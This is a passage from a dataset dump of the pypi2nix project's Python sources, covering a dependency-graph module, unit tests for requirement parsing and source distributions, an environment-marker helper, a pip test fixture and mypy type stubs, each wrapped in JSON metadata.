DefaultDict\nfrom typing import Dict\nfrom typing import Generator\nfrom typing import List\nfrom typing import Set\nfrom typing import TypeVar\n\nimport yaml\n\nfrom pypi2nix.external_dependencies import ExternalDependency\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirements import Requirement\nfrom pypi2nix.wheel import Wheel\n\nK = TypeVar(\"K\")\nV = TypeVar(\"V\")\n\n\nclass DependencyGraph:\n def __init__(self) -> None:\n self._runtime_dependencies: DefaultDict[str, Set[str]] = defaultdict(\n lambda: set()\n )\n self._buildtime_dependencies: DefaultDict[str, Set[str]] = defaultdict(\n lambda: set()\n )\n self._external_dependencies: DefaultDict[\n str, Set[ExternalDependency]\n ] = defaultdict(lambda: set())\n\n def set_runtime_dependency(\n self, dependent: Requirement, dependency: Requirement\n ) -> None:\n self._raise_on_cyclic_dependency(dependent, dependency)\n self._runtime_dependencies[dependent.name()].add(dependency.name())\n\n def set_buildtime_dependency(\n self, dependent: Requirement, dependency: Requirement\n ) -> None:\n self._raise_on_cyclic_dependency(dependent, dependency)\n self._buildtime_dependencies[dependent.name()].add(dependency.name())\n\n def set_external_dependency(\n self, dependent: Requirement, dependency: ExternalDependency\n ) -> None:\n self._external_dependencies[dependent.name()].add(dependency)\n\n def is_runtime_dependency(\n self, dependent: Requirement, dependency: Requirement\n ) -> bool:\n return self._is_runtime_child(dependent.name(), dependency.name())\n\n def is_buildtime_dependency(\n self, dependent: Requirement, dependency: Requirement\n ) -> bool:\n return self._is_python_child(dependent.name(), dependency.name())\n\n def get_all_build_dependency_names(self, package: Requirement) -> Set[str]:\n return set(self._get_python_children(package.name()))\n\n def get_all_runtime_dependency_names(self, package: Requirement) -> Set[str]:\n return set(self._get_runtime_children(package.name()))\n\n def get_all_external_dependencies(\n self, package: Requirement\n ) -> Set[ExternalDependency]:\n found_dependencies: Set[ExternalDependency] = set()\n for package_name in self._get_python_children(package.name()):\n found_dependencies.update(self._external_dependencies[package_name])\n return found_dependencies\n\n def import_wheel(self, wheel: Wheel, requirement_parser: RequirementParser) -> None:\n dependent = requirement_parser.parse(wheel.name)\n for runtime_dependency in wheel.runtime_dependencies(wheel.target_platform()):\n\n self.set_runtime_dependency(dependent, runtime_dependency)\n for build_dependency in wheel.build_dependencies(wheel.target_platform()):\n self.set_buildtime_dependency(dependent, build_dependency)\n\n def serialize(self) -> str:\n document: DefaultDict[str, Dict[str, List[str]]] = defaultdict(lambda: dict())\n for key, external_dependencies in self._external_dependencies.items():\n document[key][\"externalDependencies\"] = [\n dep.attribute_name() for dep in external_dependencies\n ]\n for key, runtime_dependencies in self._runtime_dependencies.items():\n document[key][\"runtimeDependencies\"] = list(runtime_dependencies)\n for key, buildtime_dependencies in self._buildtime_dependencies.items():\n document[key][\"buildtimeDependencies\"] = list(buildtime_dependencies)\n return yaml.dump(dict(document)) # type: ignore\n\n @classmethod\n def deserialize(_class, data: str) -> \"DependencyGraph\":\n document: DefaultDict[str, Dict[str, List[str]]]\n document = yaml.load(data, 
Loader=yaml.Loader)\n graph = DependencyGraph()\n for package, dependencies in document.items():\n external_dependencies = dependencies.get(\"externalDependencies\")\n if external_dependencies is not None:\n graph._external_dependencies[package] = {\n ExternalDependency(name) for name in external_dependencies\n }\n runtime_dependencies = dependencies.get(\"runtimeDependencies\")\n if runtime_dependencies is not None:\n graph._runtime_dependencies[package] = set(runtime_dependencies)\n buildtime_dependencies = dependencies.get(\"buildtimeDependencies\")\n if buildtime_dependencies is not None:\n graph._buildtime_dependencies[package] = set(buildtime_dependencies)\n return graph\n\n def _raise_on_cyclic_dependency(\n self, dependent: Requirement, dependency: Requirement\n ) -> None:\n if self.is_buildtime_dependency(dependency, dependent):\n raise CyclicDependencyOccured(\n f\"Failed to add dependency {dependent} -> {dependency} to Graph \"\n f\"since {dependent} is alread a dependency of {dependency}\"\n )\n\n def _is_python_child(self, dependent: str, dependency: str) -> bool:\n for child in self._get_python_children(dependent):\n if child == dependency:\n return True\n return False\n\n def _is_runtime_child(self, dependent: str, dependency: str) -> bool:\n for child in self._get_runtime_children(dependent):\n if child == dependency:\n return True\n return False\n\n def _get_python_children(self, package_name: str) -> Generator[str, None, None]:\n alread_seen: Set[str] = set()\n pending: Set[str] = {package_name}\n while pending:\n package = pending.pop()\n yield package\n alread_seen.add(package)\n for dependency in (\n self._runtime_dependencies[package]\n | self._buildtime_dependencies[package]\n ):\n if dependency in alread_seen:\n continue\n else:\n pending.add(dependency)\n\n def _get_runtime_children(self, package_name: str) -> Generator[str, None, None]:\n alread_seen: Set[str] = set()\n pending: Set[str] = {package_name}\n while pending:\n package = pending.pop()\n yield package\n alread_seen.add(package)\n for dependency in self._runtime_dependencies[package]:\n if dependency in alread_seen:\n continue\n else:\n pending.add(dependency)\n\n def __add__(self, other: \"DependencyGraph\") -> \"DependencyGraph\":\n new_graph = DependencyGraph()\n new_graph._runtime_dependencies = _merge_defaultdicts(\n self._runtime_dependencies, other._runtime_dependencies\n )\n new_graph._buildtime_dependencies = _merge_defaultdicts(\n self._buildtime_dependencies, other._buildtime_dependencies\n )\n new_graph._external_dependencies = _merge_defaultdicts(\n self._external_dependencies, other._external_dependencies\n )\n return new_graph\n\n def __copy__(self) -> \"DependencyGraph\":\n new_graph = DependencyGraph()\n new_graph._buildtime_dependencies = copy(self._buildtime_dependencies)\n new_graph._runtime_dependencies = copy(self._runtime_dependencies)\n new_graph._external_dependencies = copy(self._external_dependencies)\n return new_graph\n\n def __eq__(self, other: object) -> bool:\n if isinstance(other, DependencyGraph):\n return (\n self._runtime_dependencies == other._runtime_dependencies\n and self._buildtime_dependencies == other._buildtime_dependencies\n and self._external_dependencies == other._external_dependencies\n )\n else:\n return False\n\n def __repr__(self) -> str:\n return (\n \"DependencyGraph(\"\n f\"runtime_dependencies={repr(self._runtime_dependencies)}, \"\n f\"buildtime_dependencies={repr(self._buildtime_dependencies)}, \"\n 
f\"external_dependencies={repr(self._external_dependencies)}\"\n \")\"\n )\n\n\nclass CyclicDependencyOccured(Exception):\n pass\n\n\ndef _merge_defaultdicts(\n first: DefaultDict[str, Set[V]], second: DefaultDict[str, Set[V]]\n) -> DefaultDict[str, Set[V]]:\n return _merge_with_combine(\n first, second, combine_function=lambda x, y: x | y, constructor=lambda: set(),\n )\n\n\ndef _merge_with_combine(\n first: DefaultDict[K, V],\n second: DefaultDict[K, V],\n combine_function: Callable[[V, V], V],\n constructor: Callable[[], V],\n) -> DefaultDict[K, V]:\n combination: DefaultDict[K, V] = defaultdict(constructor)\n for first_key, first_value in first.items():\n combination[first_key] = first_value\n for second_key, second_value in second.items():\n combination[second_key] = (\n combine_function(combination[second_key], second_value)\n if second_key in combination\n else second_value\n )\n return combination\n" }, { "alpha_fraction": 0.7026957869529724, "alphanum_fraction": 0.7180273532867432, "avg_line_length": 34.49659729003906, "blob_id": "301ad705f870f4cfda23bbe85a276fdbc0291168", "content_id": "c8c00e0cb07af5f55e725ddd4631b652bd9c206e", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 15654, "license_type": "permissive", "max_line_length": 115, "num_lines": 441, "path": "/unittests/test_requirement.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os\n\nimport pytest\n\nfrom pypi2nix.package_source import GitSource\nfrom pypi2nix.package_source import HgSource\nfrom pypi2nix.package_source import PathSource\nfrom pypi2nix.requirement_parser import ParsingFailed\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.requirements import IncompatibleRequirements\nfrom pypi2nix.requirements import PathRequirement\nfrom pypi2nix.requirements import UrlRequirement\nfrom pypi2nix.requirements import VersionRequirement\n\nfrom .switches import nix\n\n\ndef test_requirement_cannot_be_constructed_from_line_containing_newline(\n requirement_parser,\n):\n with pytest.raises(ParsingFailed):\n requirement_parser.parse(\"pypi2nix\\n >= 1.0\")\n\n\ndef test_requirement_finds_name_of_pypi_packages(requirement_parser):\n requirement = requirement_parser.parse(\"pypi2nix\")\n assert requirement.name() == \"pypi2nix\"\n\n\ndef test_requirement_detects_source_of_pypi_package_as_none(requirement_parser):\n requirement = requirement_parser.parse(\"pypi2nix\")\n assert requirement.source() is None\n\n\ndef test_requirement_finds_name_of_git_package(requirement_parser):\n requirement = requirement_parser.parse(\n \"git+https://github.com/nix-community/pypi2nix.git#egg=pypi2nix\"\n )\n assert requirement.name() == \"pypi2nix\"\n\n\ndef test_requirement_finds_name_of_hg_package(requirement_parser):\n requirement = requirement_parser.parse(\"hg+https://url.test/repo#egg=testegg\")\n assert requirement.name() == \"testegg\"\n\n\ndef test_requirement_finds_name_of_url_package(requirement_parser):\n requirement = requirement_parser.parse(\"https://url.test/repo#egg=testegg\")\n assert requirement.name() == \"testegg\"\n\n\ndef test_requirement_can_handle_environment_marker(requirement_parser):\n requirement = requirement_parser.parse(\"pypi2nix; os_name == '%s'\" % os.name)\n assert requirement.name() == \"pypi2nix\"\n\n\ndef test_applies_to_target_works_properly_with_positiv_marker(\n current_platform, requirement_parser\n):\n requirement = requirement_parser.parse(\"pypi2nix; os_name == '%s'\" % 
os.name)\n assert requirement.applies_to_target(current_platform)\n\n\ndef test_applies_to_target_works_properly_with_negative_marker(\n current_platform, requirement_parser\n):\n requirement = requirement_parser.parse(\"pypi2nix; os_name != '%s'\" % os.name)\n assert not requirement.applies_to_target(current_platform)\n\n\n@pytest.mark.parametrize(\n \"line, expected\",\n [\n (\"PyPi2Nix\", \"pypi2nix\"),\n (\"TestReq >= 1.0\", \"testreq\"),\n (\"path/to/req#egg=test_req\", \"test-req\"),\n (\"https://test.test#egg=Test_Req\", \"test-req\"),\n ],\n)\ndef test_names_of_requirements_are_canonicalized(line, expected, requirement_parser):\n requirement = requirement_parser.parse(line)\n assert requirement.name() == expected\n\n\ndef test_to_line_reproduces_canonicalized_name(requirement_parser):\n name = \"pypi2nix\"\n requirement = requirement_parser.parse(name)\n assert name in requirement.to_line()\n\n\ndef test_to_line_reproduces_version_specifier(requirement_parser):\n line = \"pypi2nix < 2.0, >= 1.9\"\n requirement = requirement_parser.parse(line)\n assert \"< 2.0\" in requirement.to_line()\n assert \">= 1.9\" in requirement.to_line()\n\n\ndef test_from_line_recognizes_git_sources(requirement_parser):\n line = \"git+https://test.test/test#egg=test-egg\"\n requirement = requirement_parser.parse(line)\n assert requirement.name() == \"test-egg\"\n assert isinstance(requirement.source(), GitSource)\n\n\ndef test_from_line_accepts_requirement_with_marker_including_in_operator(\n requirement_parser,\n):\n requirement = requirement_parser.parse(\"zipfile36; python_version in '3.3 3.4 3.5'\")\n assert requirement.name() == \"zipfile36\"\n\n\ndef test_that_applies_to_target_works_with_in_keyword(\n current_platform, requirement_parser\n):\n requirement = requirement_parser.parse(\n \"pypi2nix; python_version in '{}'\".format(current_platform.python_version)\n )\n assert requirement.applies_to_target(current_platform)\n\n\ndef test_that_mercurial_source_url_gets_detected(requirement_parser):\n requirement = requirement_parser.parse(\n \"hg+https://bitbucket.org/tarek/flake8@a209fb6#egg=flake8\"\n )\n assert isinstance(requirement, UrlRequirement)\n assert requirement.url() == \"hg+https://bitbucket.org/tarek/flake8@a209fb6\"\n\n\n@nix\ndef test_that_mercurial_source_extracted_is_valid(requirement_parser):\n requirement = requirement_parser.parse(\n \"hg+https://bitbucket.org/tarek/flake8@a209fb6#egg=flake8\"\n )\n source = requirement.source()\n assert isinstance(source, HgSource)\n source.nix_expression()\n\n\n@nix\ndef test_that_git_source_extracted_is_valid(requirement_parser):\n requirement = requirement_parser.parse(\n \"git+https://github.com/nix-community/pypi2nix.git@5c65345a2ce7f2f1c376f983d20e935c09c15995#egg=pypi2nix\"\n )\n source = requirement.source()\n assert isinstance(source, GitSource)\n source.nix_expression()\n\n\ndef test_that_from_line_to_line_preserves_urls(requirement_parser):\n line = \"git+https://example.test/#egg=testegg\"\n requirement = requirement_parser.parse(line)\n assert requirement.to_line() == line\n\n\ndef test_that_to_line_reproduces_path_correctly(requirement_parser: RequirementParser):\n line = \"path/to/requirement#egg=test-requirement\"\n requirement = requirement_parser.parse(line)\n requirement = requirement_parser.parse(requirement.to_line())\n assert isinstance(requirement, UrlRequirement)\n assert requirement.url() == \"file://path/to/requirement\"\n\n\ndef test_that_requirements_can_be_added_together_adding_version_constraints(\n current_platform, 
requirement_parser\n):\n req1 = requirement_parser.parse(\"req >= 1.0\")\n assert isinstance(req1, VersionRequirement)\n req2 = requirement_parser.parse(\"req >= 2.0\")\n assert isinstance(req2, VersionRequirement)\n sum_requirement = req1.add(req2, current_platform)\n assert isinstance(sum_requirement, VersionRequirement)\n assert len(sum_requirement.version()) == len(req1.version()) + len(req2.version())\n\n\ndef test_that_adding_requirements_with_different_names_throws(\n current_platform, requirement_parser\n):\n req1 = requirement_parser.parse(\"req1\")\n req2 = requirement_parser.parse(\"req2\")\n with pytest.raises(IncompatibleRequirements):\n req1.add(req2, current_platform)\n\n\ndef test_that_adding_requirements_with_a_version_and_a_url_results_in_url_requirement(\n current_platform, requirement_parser\n):\n for direction in [\"forward\", \"reverse\"]:\n req1 = requirement_parser.parse(\"req1 >= 1.0\")\n req2 = requirement_parser.parse(\"git+https://test.test/path#egg=req1\")\n if direction == \"forward\":\n sum_requirement = req1.add(req2, current_platform)\n else:\n sum_requirement = req2.add(req1, current_platform)\n\n assert isinstance(sum_requirement, UrlRequirement)\n assert sum_requirement.url() == \"git+https://test.test/path\"\n\n\ndef test_that_adding_requirements_with_different_urls_raises(\n current_platform, requirement_parser\n):\n req1 = requirement_parser.parse(\"https://url1.test#egg=req\")\n req2 = requirement_parser.parse(\"https://url2.test#egg=req\")\n with pytest.raises(IncompatibleRequirements):\n req1.add(req2, current_platform)\n\n\ndef test_that_adding_requirements_with_the_same_url_works(\n current_platform, requirement_parser\n):\n req1 = requirement_parser.parse(\"https://url.test#egg=req\")\n req2 = requirement_parser.parse(\"https://url.test#egg=req\")\n sum_requirement = req1.add(req2, current_platform)\n\n assert isinstance(sum_requirement, UrlRequirement)\n assert sum_requirement.url() == \"https://url.test\"\n\n\ndef test_that_adding_requirements_where_one_does_not_apply_to_system_yields_the_other(\n current_platform, requirement_parser\n):\n req1 = requirement_parser.parse(\"req1\")\n req2 = requirement_parser.parse(\n 'req1 >= 1.0; python_version == \"1.0\"'\n ) # definitly not true\n sum_requirement = req1.add(req2, current_platform)\n assert isinstance(sum_requirement, VersionRequirement)\n assert not sum_requirement.version()\n\n\ndef test_that_we_parse_requirements_with_file_paths(requirement_parser):\n requirement = requirement_parser.parse(\"path/to/egg#egg=testegg\")\n assert isinstance(requirement, PathRequirement)\n assert requirement.name() == \"testegg\"\n assert requirement.path() == \"path/to/egg\"\n\n\n@pytest.mark.parametrize(\n \"req_line_1\",\n [\"req\", \"req <= 1.0\", \"https://test.test#egg=req\", \"path/to/egg#egg=req\"],\n)\n@pytest.mark.parametrize(\"req_line_2\", [\"req\", \"req <= 2.0\"])\ndef test_that_we_can_add_two(\n req_line_1, req_line_2, current_platform, requirement_parser\n):\n requirement1 = requirement_parser.parse(req_line_1)\n requirement2 = requirement_parser.parse(req_line_2)\n requirement1.add(requirement2, current_platform)\n\n\n@pytest.mark.parametrize(\n \"version_requirement_line\",\n (\n \"test-req\",\n \"test-req <= 1.0\",\n \"test-req; python_version == '3.7'\",\n \"test-req; python_version != '3.7'\",\n ),\n)\n@pytest.mark.parametrize(\n \"path_requirement_line\",\n (\"path/to/req#egg=test-req\", \"path/to/req#egg=test-req[extra]\"),\n)\ndef 
test_that_we_can_add_version_with_path_requirement_result_is_path_requirement(\n version_requirement_line,\n path_requirement_line,\n current_platform,\n requirement_parser,\n):\n req1 = requirement_parser.parse(version_requirement_line)\n req2 = requirement_parser.parse(path_requirement_line)\n sum_requirement = req1.add(req2, current_platform)\n assert isinstance(sum_requirement, PathRequirement)\n\n sum_requirement = req2.add(req1, current_platform)\n assert isinstance(sum_requirement, PathRequirement)\n\n\n@pytest.mark.parametrize(\n \"version_requirement_line\",\n (\n \"test-req\",\n \"test-req <= 1.0\",\n \"test-req; python_version == '3.7'\",\n \"test-req; python_version != '3.7'\",\n ),\n)\n@pytest.mark.parametrize(\n \"url_requirement_line\",\n (\"https://test.test/#egg=test-req\", \"https://test.test/#egg=test-req[extra]\"),\n)\ndef test_can_add_version_requirement_with_url_requirement(\n version_requirement_line, url_requirement_line, current_platform, requirement_parser\n):\n req1 = requirement_parser.parse(version_requirement_line)\n req2 = requirement_parser.parse(url_requirement_line)\n sum_requirement = req1.add(req2, current_platform)\n assert isinstance(sum_requirement, UrlRequirement)\n\n sum_requirement = req2.add(req1, current_platform)\n assert isinstance(sum_requirement, UrlRequirement)\n\n\n@pytest.mark.parametrize(\n \"url_requirement_line\",\n (\"https://test.test#egg=test-req\", \"https://test.test#egg=test-req[extra1]\"),\n)\n@pytest.mark.parametrize(\n \"path_requirement_line\",\n (\"path/to/req#egg=test-req\", \"path/to/req#egg=test-req[extra2]\"),\n)\ndef test_cannot_add_path_and_url_requirement(\n path_requirement_line, url_requirement_line, current_platform, requirement_parser\n):\n req1 = requirement_parser.parse(path_requirement_line)\n req2 = requirement_parser.parse(url_requirement_line)\n with pytest.raises(IncompatibleRequirements):\n req1.add(req2, current_platform)\n\n with pytest.raises(IncompatibleRequirements):\n req2.add(req1, current_platform)\n\n\ndef test_cannot_add_requirements_with_different_paths(\n current_platform, requirement_parser\n):\n req1 = requirement_parser.parse(\"path/1#egg=test-req\")\n req2 = requirement_parser.parse(\"path/2#egg=test-req\")\n\n with pytest.raises(IncompatibleRequirements):\n req1.add(req2, current_platform)\n\n\ndef test_that_we_cannot_add_path_requirements_with_different_names(\n current_platform, requirement_parser\n):\n req1 = requirement_parser.parse(\"path/to/req#egg=req1\")\n req2 = requirement_parser.parse(\"path/to/req#egg=req2\")\n\n with pytest.raises(IncompatibleRequirements):\n req1.add(req2, current_platform)\n\n\ndef test_adding_path_requirements_where_one_requirement_does_not_apply(\n current_platform, requirement_parser\n):\n req1 = requirement_parser.parse(\"path/to/req#egg=test-req\")\n req2 = requirement_parser.parse(\n 'different/path#egg=test-req; python_version == \"1.0\"'\n )\n\n assert req1.add(req2, current_platform) == req1\n assert req2.add(req1, current_platform) == req1\n\n\ndef test_that_we_can_add_path_requirements_with_same_path(\n current_platform, requirement_parser\n):\n req1 = requirement_parser.parse(\"path/to/requirement#egg=test-req\")\n req2 = requirement_parser.parse(\"path/to/requirement#egg=test-req\")\n\n assert req1.add(req2, current_platform) == req1\n\n\ndef test_that_we_can_change_path_of_path_requirements(requirement_parser):\n requirement = requirement_parser.parse(\"path/to/requirement#egg=test-req\")\n assert isinstance(requirement, PathRequirement)\n 
requirement = requirement.change_path(lambda p: os.path.join(\"changed\", p))\n assert requirement.path() == \"changed/path/to/requirement\"\n\n\ndef test_that_we_can_add_url_requirements_where_one_does_not_apply(\n current_platform, requirement_parser\n):\n req1 = requirement_parser.parse(\"https://test.test#egg=test-req\")\n req2 = requirement_parser.parse(\n 'https://other.test#egg=test-req; python_version == \"1.0\"'\n )\n assert req1.add(req2, current_platform) == req1\n assert req2.add(req1, current_platform) == req1\n\n\ndef test_cannot_add_url_requirements_with_different_names(\n current_platform, requirement_parser\n):\n req1 = requirement_parser.parse(\"https://test.test#egg=req1\")\n req2 = requirement_parser.parse(\"https://test.test#egg=req2\")\n with pytest.raises(IncompatibleRequirements):\n req1.add(req2, current_platform)\n\n\ndef test_can_handle_requirements_with_python_full_version_marker(\n current_platform, requirement_parser\n):\n requirement = requirement_parser.parse(\n \"req; python_full_version == '{}'\".format(current_platform.python_full_version)\n )\n assert requirement.applies_to_target(current_platform)\n\n\ndef test_rejects_requirements_with_wrong_python_full_version_for_platform(\n current_platform, requirement_parser\n):\n requirement = requirement_parser.parse(\n \"req; python_full_version == '{}'\".format(\"1.0.0\")\n )\n assert not requirement.applies_to_target(current_platform)\n\n\ndef test_that_requirements_with_proper_os_name_applies_to_target(\n current_platform, requirement_parser\n):\n requirement = requirement_parser.parse(\n \"req; os_name == '{}'\".format(current_platform.os_name)\n )\n assert requirement.applies_to_target(current_platform)\n\n\ndef test_that_extras_of_path_requirements_are_preserved(requirement_parser):\n requirement = requirement_parser.parse(\"/path/to/egg#egg=egg[extra1,extra2]\")\n assert isinstance(requirement, PathRequirement)\n assert requirement.extras() == {\"extra1\", \"extra2\"}\n requirement = requirement_parser.parse(requirement.to_line())\n assert requirement.extras() == {\"extra1\", \"extra2\"}\n\n\ndef test_that_extras_of_url_requirements_are_preserved(requirement_parser):\n requirement = requirement_parser.parse(\n \"https://test.test/test.zip#egg=egg[extra1,extra2]\"\n )\n assert isinstance(requirement, UrlRequirement)\n assert requirement.extras() == {\"extra1\", \"extra2\"}\n requirement = requirement_parser.parse(requirement.to_line())\n assert requirement.extras() == {\"extra1\", \"extra2\"}\n\n\ndef test_that_source_of_url_requirement_with_file_scheme_is_path_source(\n requirement_parser,\n):\n requirement = requirement_parser.parse(\"file://test/path#egg=egg\")\n assert isinstance(requirement.source(), PathSource)\n" }, { "alpha_fraction": 0.7472316026687622, "alphanum_fraction": 0.7498796582221985, "avg_line_length": 28.884891510009766, "blob_id": "331e08a5a466119d6b4b98a84f1282bfcbdba1c4", "content_id": "92cd31ee33d21324de4d27f544b2c26e3c754402", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 4154, "license_type": "permissive", "max_line_length": 87, "num_lines": 139, "path": "/unittests/test_source_distribution.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os\nimport os.path\n\nimport pytest\n\nfrom pypi2nix.archive import Archive\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.package.exceptions import DistributionNotDetected\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom 
pypi2nix.source_distribution import SourceDistribution\nfrom pypi2nix.target_platform import TargetPlatform\n\nfrom .logger import get_logger_output\nfrom .switches import nix\n\n\n@pytest.fixture\ndef source_distribution(\n six_source_distribution_archive,\n logger: Logger,\n requirement_parser: RequirementParser,\n):\n return SourceDistribution.from_archive(\n six_source_distribution_archive, logger, requirement_parser=requirement_parser\n )\n\n\n@pytest.fixture\ndef flit_distribution(\n data_directory, logger: Logger, requirement_parser: RequirementParser\n):\n archive = Archive(os.path.join(data_directory, \"flit-1.3.tar.gz\"))\n return SourceDistribution.from_archive(\n archive, logger, requirement_parser=requirement_parser\n )\n\n\n@nix\ndef test_from_archive_picks_up_on_name(source_distribution):\n assert source_distribution.name == \"six\"\n\n\n@nix\ndef test_that_a_source_distributions_name_is_canonicalized(\n logger: Logger, requirement_parser: RequirementParser\n):\n distribution = SourceDistribution(\n name=\"NaMe_teSt\", logger=logger, requirement_parser=requirement_parser\n )\n assert distribution.name == \"name-test\"\n\n\n@nix\ndef test_six_package_has_no_pyproject_toml(source_distribution):\n assert source_distribution.pyproject_toml is None\n\n\n@nix\ndef test_that_flit_pyproject_toml_is_recognized(flit_distribution):\n assert flit_distribution.pyproject_toml is not None\n\n\n@nix\ndef test_that_flit_build_dependencies_contains_requests(\n flit_distribution: SourceDistribution, current_platform: TargetPlatform\n):\n assert \"requests\" in flit_distribution.build_dependencies(current_platform)\n\n\n@nix\ndef test_that_we_can_generate_objects_from_source_archives(\n source_distribution_archive, logger: Logger, requirement_parser: RequirementParser,\n):\n SourceDistribution.from_archive(\n source_distribution_archive, logger, requirement_parser=requirement_parser\n )\n\n\n@nix\ndef test_that_we_can_detect_setup_requirements_for_setup_cfg_projects(\n distribution_archive_for_jsonschema,\n current_platform,\n logger: Logger,\n requirement_parser: RequirementParser,\n):\n distribution = SourceDistribution.from_archive(\n distribution_archive_for_jsonschema,\n logger,\n requirement_parser=requirement_parser,\n )\n assert \"setuptools-scm\" in distribution.build_dependencies(current_platform)\n\n\ndef test_that_trying_to_create_source_distribution_from_random_zip_throws(\n test_zip_path, logger: Logger, requirement_parser: RequirementParser\n):\n archive = Archive(path=test_zip_path)\n with pytest.raises(DistributionNotDetected):\n SourceDistribution.from_archive(\n archive, logger, requirement_parser=requirement_parser,\n )\n\n\ndef test_build_dependencies_for_invalid_deps_logs_warning(\n data_directory,\n current_platform,\n logger: Logger,\n requirement_parser: RequirementParser,\n):\n spacy_distribution_path = os.path.join(data_directory, \"spacy-2.1.0.tar.gz\")\n archive = Archive(spacy_distribution_path)\n\n dist = SourceDistribution.from_archive(\n archive, logger, requirement_parser=requirement_parser\n )\n\n assert \"WARNING:\" not in get_logger_output(logger)\n dist.build_dependencies(current_platform)\n assert \"WARNING:\" in get_logger_output(logger)\n\n\ndef test_invalid_build_dependencies_for_setupcfg_package_logs_warning(\n data_directory,\n current_platform,\n logger: Logger,\n requirement_parser: RequirementParser,\n):\n distribution_path = os.path.join(\n data_directory, \"setupcfg-package\", \"setupcfg-package.tar.gz\"\n )\n archive = 
Archive(distribution_path)\n\n dist = SourceDistribution.from_archive(\n archive, logger, requirement_parser=requirement_parser\n )\n\n assert \"WARNING:\" not in get_logger_output(logger)\n dist.build_dependencies(current_platform)\n assert \"WARNING:\" in get_logger_output(logger)\n" }, { "alpha_fraction": 0.660611093044281, "alphanum_fraction": 0.6614368557929993, "avg_line_length": 30.05128288269043, "blob_id": "7f380065ccc77b67924a257f7f279fd98eca89c7", "content_id": "425721778753f8f691d93142ccb80a64530dbb36", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1211, "license_type": "no_license", "max_line_length": 82, "num_lines": 39, "path": "/src/pypi2nix/environment_marker.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from typing import List\n\nfrom attr import attrib\nfrom attr import attrs\nfrom packaging.markers import InvalidMarker\nfrom packaging.markers import Marker\nfrom packaging.markers import UndefinedComparison\nfrom packaging.markers import UndefinedEnvironmentName\n\nfrom pypi2nix.target_platform import TargetPlatform\n\n\nclass MarkerEvaluationFailed(Exception):\n pass\n\n\n@attrs\nclass EnvironmentMarker:\n _marker_string: str = attrib()\n\n def applies_to_platform(\n self, target_platform: TargetPlatform, extras: List[str] = []\n ) -> bool:\n def _applies_to_platform_with_extra(extra: str) -> bool:\n environment = target_platform.environment_dictionary()\n environment[\"extra\"] = extra\n try:\n return Marker(self._marker_string).evaluate(environment)\n except (InvalidMarker, UndefinedComparison, UndefinedEnvironmentName):\n raise MarkerEvaluationFailed(\n f\"Failed to evaluate marker {self._marker_string}\"\n )\n\n if not extras:\n extras = [\"\"]\n for extra in extras:\n if _applies_to_platform_with_extra(extra):\n return True\n return False\n" }, { "alpha_fraction": 0.6352459192276001, "alphanum_fraction": 0.6409835815429688, "avg_line_length": 26.727272033691406, "blob_id": "19f0ededb3df39a15c996679ab67c312a460be14", "content_id": "c6435fecb87696b681e05d78649ec90c9987ba77", "detected_licenses": [ "Apache-2.0" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1220, "license_type": "permissive", "max_line_length": 67, "num_lines": 44, "path": "/unittests/pip/conftest.py", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "import os.path\nimport venv\n\nimport pytest\n\nfrom pypi2nix.logger import Logger\nfrom pypi2nix.nix import Nix\nfrom pypi2nix.path import Path\nfrom pypi2nix.pip import NixPip\nfrom pypi2nix.pip import VirtualenvPip\nfrom pypi2nix.requirement_parser import RequirementParser\nfrom pypi2nix.target_platform import TargetPlatform\n\n\n@pytest.fixture(params=(\"nix\", \"venv\"))\ndef pip(\n request,\n nix: Nix,\n project_dir: str,\n current_platform: TargetPlatform,\n logger: Logger,\n requirement_parser: RequirementParser,\n):\n if request.param == \"nix\":\n return NixPip(\n nix=nix,\n project_directory=Path(project_dir),\n extra_build_inputs=[],\n extra_env=\"\",\n wheels_cache=[],\n target_platform=current_platform,\n logger=logger,\n requirement_parser=requirement_parser,\n )\n else:\n pip = VirtualenvPip(\n logger=logger,\n target_platform=current_platform,\n target_directory=os.path.join(project_dir, \"venv-pip\"),\n env_builder=venv.EnvBuilder(with_pip=True),\n requirement_parser=requirement_parser,\n )\n pip.prepare_virtualenv()\n return pip\n" }, { "alpha_fraction": 0.6666666865348816, "alphanum_fraction": 
0.6666666865348816, "avg_line_length": 28, "blob_id": "8e89fe43d6db4001cad81ae137716b55e38d5149", "content_id": "0aafb32b99d65bc709f706700347cb8fb79e0b90", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 174, "license_type": "no_license", "max_line_length": 76, "num_lines": 6, "path": "/mypy/setuptools/config.pyi", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from typing import Any\nfrom typing import Dict\n\ndef read_configuration(\n filepath: str, find_others: bool = ..., ignore_option_errors: bool = ...\n) -> Dict[str, Any]: ...\n" }, { "alpha_fraction": 0.6757990717887878, "alphanum_fraction": 0.6757990717887878, "avg_line_length": 20.899999618530273, "blob_id": "740010454df9499eb221ec72290712eea675c0a6", "content_id": "33eef5473392afca474a18221e9a979a1c032ccf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 219, "license_type": "no_license", "max_line_length": 61, "num_lines": 10, "path": "/mypy/packaging/version.pyi", "repo_name": "garbas/pypi2nix", "src_encoding": "UTF-8", "text": "from typing import Union\n\nclass InvalidVersion(ValueError): ...\n\nclass Version:\n def __init__(self, version: str) -> None: ...\n\nclass LegacyVersion: ...\n\ndef parse(version: str) -> Union[Version, LegacyVersion]: ...\n" }, { "alpha_fraction": 0.5755338668823242, "alphanum_fraction": 0.577464759349823, "avg_line_length": 33.79841995239258, "blob_id": "4005a8718bbde1beb1063d0a88e84f046a0ba32f", "content_id": "f40453a0faa44a41e2a8410187126c2022637ebb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", 